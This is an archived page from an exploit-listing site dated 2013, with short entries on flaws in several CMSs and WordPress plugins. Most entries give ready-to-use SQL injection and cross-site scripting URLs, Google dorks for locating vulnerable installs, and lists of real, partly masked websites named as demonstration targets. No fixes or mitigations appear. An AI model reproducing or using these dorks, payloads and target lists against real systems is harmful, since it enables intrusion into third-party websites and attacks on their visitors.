Exploits

Actualizer CMS – Multiple Vulnerabilities

By |October 10th, 2013|

Title: Actualizer CMS – Multiple Vulnerabilities
Date: 22.09.2013
Tested on: Linux 3.0 – 3.9 (95%)
Vendor: actualizer.pl
Dork: intext:”Powered by Actualizer & Heuristic”
Contact: [email protected]

1. Blind SQL Injection
host/galeria/galeria-2 /gal,1 ‘%20or%20’1’=’2.html – false
host/galeria/galeria-2/gal,1 ‘%20or%20’1 ‘= ‘ 1. html – true
PoC:
http://site/galeria/galeria-2/gal,1 ‘%20or%20 ‘1’=’ 2. html
2. Cross Site Scripting
host/katalog/nowosci/archiwum/year,”xss
PoC:
site/katalog/nowosci/archiwum/year,”xss
3. Full Path Disclosure
host/newsletter.php
POST: action=save&cat=666%email[][email protected]&imie=devil

host/konto/rejestracja
POST (multipart): login=1

Comments Off on Actualizer CMS – Multiple Vulnerabilities
  • WordPress-Complete-Gallery-Manager-3.3.3-File-Upload-Vulnerability
    Permalink WordPress-Complete-Gallery-Manager-3.3.3-File-Upload-VulnerabilityGallery

    WordPress Complete Gallery Manager 3.3.3 File Upload Vulnerability

WordPress Complete Gallery Manager 3.3.3 File Upload Vulnerability

By |October 8th, 2013|

Title: WordPress Plugin Complete Gallery Manager 3.3.3 – Arbitrary File Upload Vulnerability
Date: 013-09-17
References: http://www.vulnerability-lab.com/get_content.php?id=1080
VL-ID: 1080
Common Vulnerability Scoring System: 6.6
Vendor Homepage: http://codecanyon.net/item/complete-gallery-manager-for-wordpress/2418606

Introduction:
Using Complete Gallery Manager will make it fun and fast to manage and create galleries for your website.
The plugin enables a wealth of functionality, but just because you can take advantage of its many […]

Comments Off on WordPress Complete Gallery Manager 3.3.3 File Upload Vulnerability

Fuse Web SQL Injection Vulnerability

By |October 6th, 2013|

Exploit Title: Fuse Web SQL Injection Vulnerability SQL Injection Vulnerability In FuseWeb

Exploit Author: Ashiyane Digital Security Team
Discovered By : ACC3SS
Software Link : http://www.fuse.no
Google Dork: intext:”Powered by Fuse Web”
Tested on: Windows,Linux
Date : 2013/09/14

Location :
127.0.0.1/path/?HovedMenyId=&InnholdMenyId=&Mode=[Sql Injection]
Proof:
http://www.bjXom/?HovedMenyId=&InnholdMenyId=&Mode=’
http://www.X/?HovedMenyId=&InnholdMenyId=&Mode=’
http://wX/?HovedMenyId=&InnholdMenyId=&Mode=’
http://wwX/?HovedMenyId=&InnholdMenyId=&Mode=’
http://wwXno/?HovedMenyId=&InnholdMenyId=&Mode=’
http://X.no/?HovedMenyId=&InnholdMenyId=&Mode=’
http://wwXno/?HovedMenyId=&InnholdMenyId=&Mode=’
http://wwXning.no/?HovedMenyId=&InnholdMenyId=&Mode=’
http://stabbuXkk.no/?HovedMenyId=&InnholdMenyId=&Mode=’
http://www.romXXaard.no/?HovedMenyId=&InnholdMenyId=&Mode=’
 
source:cxsecurity

Comments Off on Fuse Web SQL Injection Vulnerability

YSD Shoping CMS XSS Vulnerability

By |October 6th, 2013|

Exploit Title: YSD Shoping CMS XSS Vulnerability XSS Vulnerability In YSD Shoping CMS Date: 2013 13 September
Author: Hossein Hezami ( Dr.3v1l )
Author Email: [email protected]
Software Link: www.ysd.hk
Version: All Version
Category: webapps
Google dork : inurl:”/product_list.php?bid=” , intext:”Designed by YSD”
Tested on: Windows and Linux

Exploit :
http:///search_result.php?search_key=[XSS]
http:///product_list.php?bid=[XSS]
Demo :
www.dmXaudio.com/search_result.php?search_key=xss
www.Xom/search_result.php?search_key=xss
wwwXm/product_list.php?bid=xss
www.shoXbaby.com.hk/product_list.php?bid=xss

Comments Off on YSD Shoping CMS XSS Vulnerability

PhpLinks Cross Site Scripting Vulnerability

By |October 6th, 2013|

Exploit Title: PhpLinks Cross Site Scripting Vulnerability XSS Vulnerability In PhpLinks Date: 2013 15 September
Author: Arsan
Author email: [email protected]
Author Twitter: @ArsanBlackhat
Vendor Homepage: www.newphplinks.com
Version : All Version
Tested on: Linux & Windows
Category: webapps
Google Keywords: ┬áinurl:”/index.php?PID=” intext:”Powered By phpLinks”

Exploit :
http://127.0.0.1:8081/index.php?PID=[XSS]
http://127.0.0.1:8081/[XSS In SearchBox]

Demo :
www.nXuth.com/index.php?PID=xss
www.eXeli.at/phplinks/index.php?PID=xss
www.ingegnXambientali.it/cercambiente/index.php?PID=xss
www.tourisXfo.it/index.php?PID=xss
www.lupuXnce-timbres.net/index.php?PID=xss
www.links.sXlbard.com/index.php?PID=xss

Comments Off on PhpLinks Cross Site Scripting Vulnerability
  • WordPress-Comment-Attachment-1.0-Cross-Site-Scripting-Vulnerability
    Permalink WordPress-Comment-Attachment-1.0-Cross-Site-Scripting-VulnerabilityGallery

    WordPress Comment Attachment 1.0 Cross Site Scripting Vulnerability

WordPress Comment Attachment 1.0 Cross Site Scripting Vulnerability

By |October 5th, 2013|

Exploit Title: WordPress Comment Attachment 1.0 Cross Site Scripting
Date: 2013 20 September
Author: Arsan
author email: [email protected]
author twitter: @ArsanBlackhat
Software Link: http://wordpress.org/plugins/comment-attachment/
Version : 1.0
Tested on: Linux & Windows
Category: webapps
Google Dork : inurl:”/comment-attachment/comment-attachment.php”
Exploit :
[-] Description :
1) Download “Comment Attachment” And Install
2) Go To Sitting Comment Attachment :
Settings > Discussion > Comment Attachment
3) Insert In “Attachment field title” This […]

Comments Off on WordPress Comment Attachment 1.0 Cross Site Scripting Vulnerability